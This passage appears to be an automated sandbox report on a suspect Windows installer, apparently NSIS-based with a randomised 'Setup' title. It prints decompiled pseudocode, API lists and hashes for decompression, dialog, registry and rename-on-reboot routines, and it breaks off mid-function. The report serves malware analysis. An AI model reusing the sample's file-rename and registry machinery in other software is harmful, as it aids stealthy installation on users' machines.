                    • String ID:
                    • API String ID:
                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                    • Instruction ID: f0d92eff914e3dec11437d5c0516f8cadc9e03df56e1f8f1d60125d8f2b443cb
                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                    • Instruction Fuzzy Hash: 4BC1703220969709FB5DC739843583EBEE19BA26F1317076ED8B2CB1D8FF20D5649620
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0040681A(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
                    				signed int _v8;
                    				unsigned int _v12;
                    				signed int _v16;
                    				intOrPtr _v20;
                    				signed int _v24;
                    				signed int _v28;
                    				intOrPtr* _v32;
                    				signed int* _v36;
                    				signed int _v40;
                    				signed int _v44;
                    				intOrPtr _v48;
                    				intOrPtr _v52;
                    				void _v116;
                    				signed int _v176;
                    				signed int _v180;
                    				signed int _v240;
                    				signed int _t166;
                    				signed int _t168;
                    				intOrPtr _t175;
                    				signed int _t181;
                    				void* _t182;
                    				intOrPtr _t183;
                    				signed int* _t184;
                    				signed int _t186;
                    				signed int _t187;
                    				signed int* _t189;
                    				signed int _t190;
                    				intOrPtr* _t191;
                    				intOrPtr _t192;
                    				signed int _t193;
                    				signed int _t195;
                    				signed int _t200;
                    				signed int _t205;
                    				void* _t207;
                    				short _t208;
                    				signed char _t222;
                    				signed int _t224;
                    				signed int _t225;
                    				signed int* _t232;
                    				signed int _t233;
                    				signed int _t234;
                    				void* _t235;
                    				signed int _t236;
                    				signed int _t244;
                    				signed int _t246;
                    				signed int _t251;
                    				signed int _t254;
                    				signed int _t256;
                    				signed int _t259;
                    				signed int _t262;
                    				void* _t263;
                    				void* _t264;
                    				signed int _t267;
                    				intOrPtr _t269;
                    				intOrPtr _t271;
                    				signed int _t274;
                    				intOrPtr* _t275;
                    				unsigned int _t276;
                    				void* _t277;
                    				signed int _t278;
                    				intOrPtr* _t279;
                    				signed int _t281;
                    				intOrPtr _t282;
                    				intOrPtr _t283;
                    				signed int* _t284;
                    				signed int _t286;
                    				signed int _t287;
                    				signed int _t288;
                    				signed int _t296;
                    				signed int* _t297;
                    				intOrPtr _t298;
                    				void* _t299;
                    
                    				_t278 = _a8;
                    				_t187 = 0x10;
                    				memset( &_v116, 0, _t187 << 2);
                    				_t189 = _a4;
                    				_t233 = _t278;
                    				do {
                    					_t166 =  *_t189;
                    					_t189 =  &(_t189[1]);
                    					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
                    					_t233 = _t233 - 1;
                    				} while (_t233 != 0);
                    				if(_v116 != _t278) {
                    					_t279 = _a28;
                    					_t267 =  *_t279;
                    					_t190 = 1;
                    					_a28 = _t267;
                    					_t234 = 0xf;
                    					while(1) {
                    						_t168 = 0;
                    						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
                    							break;
                    						}
                    						_t190 = _t190 + 1;
                    						if(_t190 <= _t234) {
                    							continue;
                    						}
                    						break;
                    					}
                    					_v8 = _t190;
                    					if(_t267 < _t190) {
                    						_a28 = _t190;
                    					}
                    					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
                    						_t234 = _t234 - 1;
                    						if(_t234 != 0) {
                    							continue;
                    						}
                    						break;
                    					}
                    					_v28 = _t234;
                    					if(_a28 > _t234) {
                    						_a28 = _t234;
                    					}
                    					 *_t279 = _a28;
                    					_t181 = 1 << _t190;
                    					while(_t190 < _t234) {
                    						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
                    						if(_t182 < 0) {
                    							L64:
                    							return _t168 | 0xffffffff;
                    						}
                    						_t190 = _t190 + 1;
                    						_t181 = _t182 + _t182;
                    					}
                    					_t281 = _t234 << 2;
                    					_t191 = _t299 + _t281 - 0x70;
                    					_t269 =  *_t191;
                    					_t183 = _t181 - _t269;
                    					_v52 = _t183;
                    					if(_t183 < 0) {
                    						goto L64;
                    					}
                    					_v176 = _t168;
                    					 *_t191 = _t269 + _t183;
                    					_t192 = 0;
                    					_t235 = _t234 - 1;
                    					if(_t235 == 0) {
                    						L21:
                    						_t184 = _a4;
                    						_t271 = 0;
                    						do {
                    							_t193 =  *_t184;
                    							_t184 =  &(_t184[1]);
                    							if(_t193 != _t168) {
                    								_t232 = _t299 + _t193 * 4 - 0xb0;
                    								_t236 =  *_t232;
                    								 *((intOrPtr*)(0x42cdf0 + _t236 * 4)) = _t271;
                    								 *_t232 = _t236 + 1;
                    							}
                    							_t271 = _t271 + 1;
                    						} while (_t271 < _a8);
                    						_v16 = _v16 | 0xffffffff;
                    						_v40 = _v40 & 0x00000000;
                    						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
                    						_t195 = _v8;
                    						_t186 =  ~_a28;
                    						_v12 = _t168;
                    						_v180 = _t168;
                    						_v36 = 0x42cdf0;
                    						_v240 = _t168;
                    						if(_t195 > _v28) {
                    							L62:
                    							_t168 = 0;
                    							if(_v52 == 0 || _v28 == 1) {
                    								return _t168;
                    							} else {
                    								goto L64;
                    							}
                    						}
                    						_v44 = _t195 - 1;
                    						_v32 = _t299 + _t195 * 4 - 0x70;
                    						do {
                    							_t282 =  *_v32;
                    							if(_t282 == 0) {
                    								goto L61;
                    							}
                    							while(1) {
                    								_t283 = _t282 - 1;
                    								_t200 = _a28 + _t186;
                    								_v48 = _t283;
                    								_v24 = _t200;
                    								if(_v8 <= _t200) {
                    									goto L45;
                    								}
                    								L31:
                    								_v20 = _t283 + 1;
                    								do {
                    									_v16 = _v16 + 1;
                    									_t296 = _v28 - _v24;
                    									if(_t296 > _a28) {
                    										_t296 = _a28;
                    									}
                    									_t222 = _v8 - _v24;
                    									_t254 = 1 << _t222;
                    									if(1 <= _v20) {
                    										L40:
                    										_t256 =  *_a36;
                    										_t168 = 1 << _t222;
                    										_v40 = 1;
                    										_t274 = _t256 + 1;
                    										if(_t274 > 0x5a0) {
                    											goto L64;
                    										}
                    									} else {
                    										_t275 = _v32;
                    										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
                    										if(_t222 >= _t296) {
                    											goto L40;
                    										}
                    										while(1) {
                    											_t222 = _t222 + 1;
                    											if(_t222 >= _t296) {
                    												goto L40;
                    											}
                    											_t275 = _t275 + 4;
                    											_t264 = _t263 + _t263;
                    											_t175 =  *_t275;
                    											if(_t264 <= _t175) {
                    												goto L40;
                    											}
                    											_t263 = _t264 - _t175;
                    										}
                    										goto L40;
                    									}
                    									_t168 = _a32 + _t256 * 4;
                    									_t297 = _t299 + _v16 * 4 - 0xec;
                    									 *_a36 = _t274;
                    									_t259 = _v16;
                    									 *_t297 = _t168;
                    									if(_t259 == 0) {
                    										 *_a24 = _t168;
                    									} else {
                    										_t276 = _v12;
                    										_t298 =  *((intOrPtr*)(_t297 - 4));
                    										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
                    										_a5 = _a28;
                    										_a4 = _t222;
                    										_t262 = _t276 >> _t186;
                    										_a6 = (_t168 - _t298 >> 2) - _t262;
                    										 *(_t298 + _t262 * 4) = _a4;
                    									}
                    									_t224 = _v24;
                    									_t186 = _t224;
                    									_t225 = _t224 + _a28;
                    									_v24 = _t225;
                    								} while (_v8 > _t225);
                    								L45:
                    								_t284 = _v36;
                    								_a5 = _v8 - _t186;
                    								if(_t284 < 0x42cdf0 + _a8 * 4) {
                    									_t205 =  *_t284;
                    									if(_t205 >= _a12) {
                    										_t207 = _t205 - _a12 + _t205 - _a12;
                    										_v36 =  &(_v36[1]);
                    										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
                    										_t208 =  *((intOrPtr*)(_t207 + _a16));
                    									} else {
                    										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
                    										_t208 =  *_t284;
                    										_v36 =  &(_t284[1]);
                    									}
                    									_a6 = _t208;
                    								} else {
                    									_a4 = 0xc0;
                    								}
                    								_t286 = 1 << _v8 - _t186;
                    								_t244 = _v12 >> _t186;
                    								while(_t244 < _v40) {
                    									 *(_t168 + _t244 * 4) = _a4;
                    									_t244 = _t244 + _t286;
                    								}
                    								_t287 = _v12;
                    								_t246 = 1 << _v44;
                    								while((_t287 & _t246) != 0) {
                    									_t287 = _t287 ^ _t246;
                    									_t246 = _t246 >> 1;
                    								}
                    								_t288 = _t287 ^ _t246;
                    								_v20 = 1;
                    								_v12 = _t288;
                    								_t251 = _v16;
                    								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
                    									L60:
                    									if(_v48 != 0) {
                    										_t282 = _v48;
                    										_t283 = _t282 - 1;
                    										_t200 = _a28 + _t186;
                    										_v48 = _t283;
                    										_v24 = _t200;
                    										if(_v8 <= _t200) {
                    											goto L45;
                    										}
                    										goto L31;
                    									}
                    									break;
                    								} else {
                    									goto L58;
                    								}
                    								do {
                    									L58:
                    									_t186 = _t186 - _a28;
                    									_t251 = _t251 - 1;
                    								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
                    								_v16 = _t251;
                    								goto L60;
                    							}
                    							L61:
                    							_v8 = _v8 + 1;
                    							_v32 = _v32 + 4;
                    							_v44 = _v44 + 1;
                    						} while (_v8 <= _v28);
                    						goto L62;
                    					}
                    					_t277 = 0;
                    					do {
                    						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
                    						_t277 = _t277 + 4;
                    						_t235 = _t235 - 1;
                    						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
                    					} while (_t235 != 0);
                    					goto L21;
                    				}
                    				 *_a24 =  *_a24 & 0x00000000;
                    				 *_a28 =  *_a28 & 0x00000000;
                    				return 0;
                    			}

                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9c33ce0fc1a3953d6a0fdc535813205e5f0e8e75a81554b33e1599d899765756
                    • Instruction ID: 233014ff28be9fca5e40c1aeee1244862099a57bf12043c09a7623bfee50ec27
                    • Opcode Fuzzy Hash: 9c33ce0fc1a3953d6a0fdc535813205e5f0e8e75a81554b33e1599d899765756
                    • Instruction Fuzzy Hash: D0C13B71A00259CBCF14DF68C4905EEB7B2FF99314F26826AD856B7380D734A952CF94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 93%
                    			E00403E25(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                    				char* _v8;
                    				signed int _v12;
                    				void* _v16;
                    				struct HWND__* _t52;
                    				intOrPtr _t71;
                    				intOrPtr _t85;
                    				long _t86;
                    				int _t98;
                    				struct HWND__* _t99;
                    				signed int _t100;
                    				intOrPtr _t107;
                    				intOrPtr _t109;
                    				int _t110;
                    				signed int* _t112;
                    				signed int _t113;
                    				char* _t114;
                    				CHAR* _t115;
                    
                    				if(_a8 != 0x110) {
                    					if(_a8 != 0x111) {
                    						L11:
                    						if(_a8 != 0x4e) {
                    							if(_a8 == 0x40b) {
                    								 *0x429fb8 =  *0x429fb8 + 1;
                    							}
                    							L25:
                    							_t110 = _a16;
                    							L26:
                    							return E00403D44(_a8, _a12, _t110);
                    						}
                    						_t52 = GetDlgItem(_a4, 0x3e8);
                    						_t110 = _a16;
                    						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                    							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                    							_t109 =  *((intOrPtr*)(_t110 + 0x18));
                    							_v12 = _t100;
                    							_v16 = _t109;
                    							_v8 = 0x42db00;
                    							if(_t100 - _t109 < 0x800) {
                    								SendMessageA(_t52, 0x44b, 0,  &_v16);
                    								SetCursor(LoadCursorA(0, 0x7f02));
                    								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
                    								SetCursor(LoadCursorA(0, 0x7f00));
                    								_t110 = _a16;
                    							}
                    						}
                    						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                    							goto L26;
                    						} else {
                    							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                    								SendMessageA( *0x42eb68, 0x111, 1, 0);
                    							}
                    							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                    								SendMessageA( *0x42eb68, 0x10, 0, 0);
                    							}
                    							return 1;
                    						}
                    					}
                    					if(_a12 >> 0x10 != 0 ||  *0x429fb8 != 0) {
                    						goto L25;
                    					} else {
                    						_t112 =  *0x4297a8 + 0x14;
                    						if(( *_t112 & 0x00000020) == 0) {
                    							goto L25;
                    						}
                    						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                    						E00403CFF(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                    						E004040B0();
                    						goto L11;
                    					}
                    				}
                    				_t98 = _a16;
                    				_t113 =  *(_t98 + 0x30);
                    				if(_t113 < 0) {
                    					_t107 =  *0x42e33c; // 0x6c4e95
                    					_t113 =  *(_t107 - 4 + _t113 * 4);
                    				}
                    				_t71 =  *0x42eb98; // 0x6c3bb4
                    				_push( *((intOrPtr*)(_t98 + 0x34)));
                    				_t114 = _t113 + _t71;
                    				_push(0x22);
                    				_a16 =  *_t114;
                    				_v12 = _v12 & 0x00000000;
                    				_t115 = _t114 + 1;
                    				_v16 = _t115;
                    				_v8 = E00403DF1;
                    				E00403CDD(_a4);
                    				_push( *((intOrPtr*)(_t98 + 0x38)));
                    				_push(0x23);
                    				E00403CDD(_a4);
                    				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                    				E00403CFF( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                    				_t99 = GetDlgItem(_a4, 0x3e8);
                    				E00403D12(_t99);
                    				SendMessageA(_t99, 0x45b, 1, 0);
                    				_t85 =  *0x42eb70; // 0x6bfe70
                    				_t86 =  *(_t85 + 0x68);
                    				if(_t86 < 0) {
                    					_t86 = GetSysColor( ~_t86);
                    				}
                    				SendMessageA(_t99, 0x443, 0, _t86);
                    				SendMessageA(_t99, 0x445, 0, 0x4010000);
                    				 *0x428f9c =  *0x428f9c & 0x00000000;
                    				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                    				SendMessageA(_t99, 0x449, _a16,  &_v16);
                    				 *0x429fb8 =  *0x429fb8 & 0x00000000;
                    				return 0;
                    			}

                    APIs
                    • CheckDlgButton.USER32 ref: 00403EB0
                    • GetDlgItem.USER32 ref: 00403EC4
                    • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00403EE2
                    • GetSysColor.USER32(?), ref: 00403EF3
                    • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00403F02
                    • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00403F11
                    • lstrlenA.KERNEL32(?), ref: 00403F1B
                    • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00403F29
                    • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00403F38
                    • GetDlgItem.USER32 ref: 00403F9B
                    • SendMessageA.USER32(00000000), ref: 00403F9E
                    • GetDlgItem.USER32 ref: 00403FC9
                    • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404009
                    • LoadCursorA.USER32 ref: 00404018
                    • SetCursor.USER32(00000000), ref: 00404021
                    • ShellExecuteA.SHELL32(0000070B,open,0042DB00,00000000,00000000,00000001), ref: 00404034
                    • LoadCursorA.USER32 ref: 00404041
                    • SetCursor.USER32(00000000), ref: 00404044
                    • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404070
                    • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404084
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp
                    Similarity
                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                    • String ID: N$open$qdrjldxxem
                    • API String ID: 3615053054-460575336
                    • Opcode ID: 3195d29b63b907abe7959c186dfd862ee6b367c2438cb1dc7bf172a45b8d0b96
                    • Instruction ID: ff75cf5183ce2723ba3e9af3fd3b1123c83c1709a93184edc862a5803e63a157
                    • Opcode Fuzzy Hash: 3195d29b63b907abe7959c186dfd862ee6b367c2438cb1dc7bf172a45b8d0b96
                    • Instruction Fuzzy Hash: 3861CEB1A40209BFEB109F60CD45F6A7B69EB44715F10843AFB05BA2D1C7B8AD51CF98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • StringFromGUID2.OLE32(?,?,00000027), ref: 100018CF
                    • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,0002001F,?), ref: 10001919
                    • StringFromGUID2.OLE32(?,?,00000027), ref: 10001937
                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 1000198F
                    • RegSetValueExW.ADVAPI32(?,Description,00000000,00000001,00000000,?), ref: 100019C0
                    • RegSetValueExW.ADVAPI32(?,IconFile,00000000,00000001,?,?), ref: 100019DD
                    • RegSetValueExW.ADVAPI32(?,IconIndex,00000000,00000004,?,00000004), ref: 100019F6
                    • RegSetValueExW.ADVAPI32(?,Enable,00000000,00000004,00000000,00000004), ref: 10001A15
                    • RegCloseKey.ADVAPI32(?), ref: 10001A1F
                    • RegCloseKey.ADVAPI32(?), ref: 10001A3E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp
                    Similarity
                    • API ID: Value$CloseFromString$CreateOpen
                    • String ID: %s\%s$%s\0x%08x\%s$(%p) %s %x %s %s %s %i$Description$Enable$IconFile$IconIndex$LanguageProfile
                    • API String ID: 4095516225-583810935
                    • Opcode ID: fac05dc62692443a1795ad4fadb8c4f4760528b0f3b42c489fbd5947a9bcfcaf
                    • Instruction ID: 940509a64bb7413368312f011f5939ae1bae5f701a0e848fc53be0b70f13a253
                    • Opcode Fuzzy Hash: fac05dc62692443a1795ad4fadb8c4f4760528b0f3b42c489fbd5947a9bcfcaf
                    • Instruction Fuzzy Hash: DE512DB6A00218BBEB14DF94DC85FEF73B9EB48744F008508FA09A6185D774EA84CB61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 90%
                    			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                    				struct tagLOGBRUSH _v16;
                    				struct tagRECT _v32;
                    				struct tagPAINTSTRUCT _v96;
                    				struct HDC__* _t70;
                    				struct HBRUSH__* _t87;
                    				struct HFONT__* _t94;
                    				long _t102;
                    				intOrPtr _t115;
                    				signed int _t126;
                    				struct HDC__* _t128;
                    				intOrPtr _t130;
                    
                    				if(_a8 == 0xf) {
                    					_t130 =  *0x42eb70; // 0x6bfe70
                    					_t70 = BeginPaint(_a4,  &_v96);
                    					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                    					_a8 = _t70;
                    					GetClientRect(_a4,  &_v32);
                    					_t126 = _v32.bottom;
                    					_v32.bottom = _v32.bottom & 0x00000000;
                    					while(_v32.top < _t126) {
                    						_a12 = _t126 - _v32.top;
                    						asm("cdq");
                    						asm("cdq");
                    						asm("cdq");
                    						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                    						_t87 = CreateBrushIndirect( &_v16);
                    						_v32.bottom = _v32.bottom + 4;
                    						_a16 = _t87;
                    						FillRect(_a8,  &_v32, _t87);
                    						DeleteObject(_a16);
                    						_v32.top = _v32.top + 4;
                    					}
                    					if( *(_t130 + 0x58) != 0xffffffff) {
                    						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                    						_a16 = _t94;
                    						if(_t94 != 0) {
                    							_t128 = _a8;
                    							_v32.left = 0x10;
                    							_v32.top = 8;
                    							SetBkMode(_t128, 1);
                    							SetTextColor(_t128,  *(_t130 + 0x58));
                    							_a8 = SelectObject(_t128, _a16);
                    							DrawTextA(_t128, "foxdilaoqebdbpxrsdbw Setup", 0xffffffff,  &_v32, 0x820);
                    							SelectObject(_t128, _a8);
                    							DeleteObject(_a16);
                    						}
                    					}
                    					EndPaint(_a4,  &_v96);
                    					return 0;
                    				}
                    				_t102 = _a16;
                    				if(_a8 == 0x46) {
                    					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                    					_t115 =  *0x42eb68; // 0x1302d6
                    					 *((intOrPtr*)(_t102 + 4)) = _t115;
                    				}
                    				return DefWindowProcA(_a4, _a8, _a12, _t102);
                    			}

                    APIs
                    • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                    • BeginPaint.USER32(?,?), ref: 00401047
                    • GetClientRect.USER32 ref: 0040105B
                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                    • FillRect.USER32 ref: 004010E4
                    • DeleteObject.GDI32(?), ref: 004010ED
                    • CreateFontIndirectA.GDI32(?), ref: 00401105
                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                    • SetTextColor.GDI32(00000000,?), ref: 00401130
                    • SelectObject.GDI32(00000000,?), ref: 00401140
                    • DrawTextA.USER32(00000000,foxdilaoqebdbpxrsdbw Setup,000000FF,00000010,00000820), ref: 00401156
                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                    • DeleteObject.GDI32(?), ref: 00401165
                    • EndPaint.USER32(?,?), ref: 0040116E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp
                    Similarity
                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                    • String ID: F$foxdilaoqebdbpxrsdbw Setup
                    • API String ID: 941294808-106563543
                    • Opcode ID: 3029600e7a8438bcc5a7b1f7b0fc9c629607e2b31f65c15310fafe19c7710355
                    • Instruction ID: 226a36137513f208ef2a020474f107b038e547e09bed9ebbc09fe29577f91b00
                    • Opcode Fuzzy Hash: 3029600e7a8438bcc5a7b1f7b0fc9c629607e2b31f65c15310fafe19c7710355
                    • Instruction Fuzzy Hash: C0419B71804249AFCF058FA5CD459BFBFB9FF44314F00812AF952AA1A0C738AA51DFA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • StringFromGUID2.OLE32(00000000,?,00000027), ref: 10001B39
                    • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,0002001F,?), ref: 10001B8D
                    • RegQueryValueExW.ADVAPI32(?,Default,00000000,00000000,?,0000004E), ref: 10001BBD
                    • RegCloseKey.ADVAPI32(?), ref: 10001BD0
                    • CLSIDFromString.OLE32(?,00000000), ref: 10001BE5
                    • RegQueryValueExW.ADVAPI32(?,Profile,00000000,00000000,?,0000004E), ref: 10001C00
                    • CLSIDFromString.OLE32(?,00000000), ref: 10001C17
                    • RegCloseKey.ADVAPI32(?), ref: 10001C21
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp
                    Similarity
                    • API ID: FromString$CloseQueryValue$Open
                    • String ID: %p) %x %s %p %p$%s\%s\0x%08x\%s$Assemblies$Default$N$Profile
                    • API String ID: 1689171533-1912333115
                    • Opcode ID: 96e723503d48050ef30a3e68a45785965c9a1915bb743af49780221a9a1529de
                    • Instruction ID: 18a2b948455825383631910d6e83dea1fb37a3c8968b4a0b81802b1bfbf5cb04
                    • Opcode Fuzzy Hash: 96e723503d48050ef30a3e68a45785965c9a1915bb743af49780221a9a1529de
                    • Instruction Fuzzy Hash: 74411DB5900218FBEB11DF94DC89FEE73B9EB48340F108559FA059A144E774EA84CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 93%
                    			E00405679() {
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				intOrPtr* _t15;
                    				long _t16;
                    				intOrPtr _t18;
                    				int _t20;
                    				void* _t28;
                    				long _t29;
                    				intOrPtr* _t37;
                    				int _t43;
                    				void* _t44;
                    				long _t47;
                    				CHAR* _t49;
                    				void* _t51;
                    				void* _t53;
                    				intOrPtr* _t54;
                    				void* _t55;
                    				void* _t56;
                    
                    				_t15 = E00405C49(1);
                    				_t49 =  *(_t55 + 0x18);
                    				if(_t15 != 0) {
                    					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
                    					if(_t20 != 0) {
                    						L16:
                    						 *0x42ebf0 =  *0x42ebf0 + 1;
                    						return _t20;
                    					}
                    				}
                    				 *0x42c168 = 0x4c554e;
                    				if(_t49 == 0) {
                    					L5:
                    					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x42bbe0, 0x400);
                    					if(_t16 != 0 && _t16 <= 0x400) {
                    						_t43 = wsprintfA(0x42b7e0, "%s=%s\r\n", 0x42c168, 0x42bbe0);
                    						_t18 =  *0x42eb70; // 0x6bfe70
                    						_t56 = _t55 + 0x10;
                    						E0040594D(_t43, 0x400, 0x42bbe0, 0x42bbe0,  *((intOrPtr*)(_t18 + 0x128)));
                    						_t20 = E00405602(0x42bbe0, 0xc0000000, 4);
                    						_t53 = _t20;
                    						 *(_t56 + 0x14) = _t53;
                    						if(_t53 == 0xffffffff) {
                    							goto L16;
                    						}
                    						_t47 = GetFileSize(_t53, 0);
                    						_t7 = _t43 + 0xa; // 0xa
                    						_t51 = GlobalAlloc(0x40, _t47 + _t7);
                    						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
                    							L15:
                    							_t20 = CloseHandle(_t53);
                    							goto L16;
                    						} else {
                    							if(E00405577(_t51, "[Rename]\r\n") != 0) {
                    								_t28 = E00405577(_t26 + 0xa, 0x409328);
                    								if(_t28 == 0) {
                    									L13:
                    									_t29 = _t47;
                    									L14:
                    									E004055C3(_t51 + _t29, 0x42b7e0, _t43);
                    									SetFilePointer(_t53, 0, 0, 0);
                    									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
                    									GlobalFree(_t51);
                    									goto L15;
                    								}
                    								_t37 = _t28 + 1;
                    								_t44 = _t51 + _t47;
                    								_t54 = _t37;
                    								if(_t37 >= _t44) {
                    									L21:
                    									_t53 =  *(_t56 + 0x14);
                    									_t29 = _t37 - _t51;
                    									goto L14;
                    								} else {
                    									goto L20;
                    								}
                    								do {
                    									L20:
                    									 *((char*)(_t43 + _t54)) =  *_t54;
                    									_t54 = _t54 + 1;
                    								} while (_t54 < _t44);
                    								goto L21;
                    							}
                    							E0040592B(_t51 + _t47, "[Rename]\r\n");
                    							_t47 = _t47 + 0xa;
                    							goto L13;
                    						}
                    					}
                    				} else {
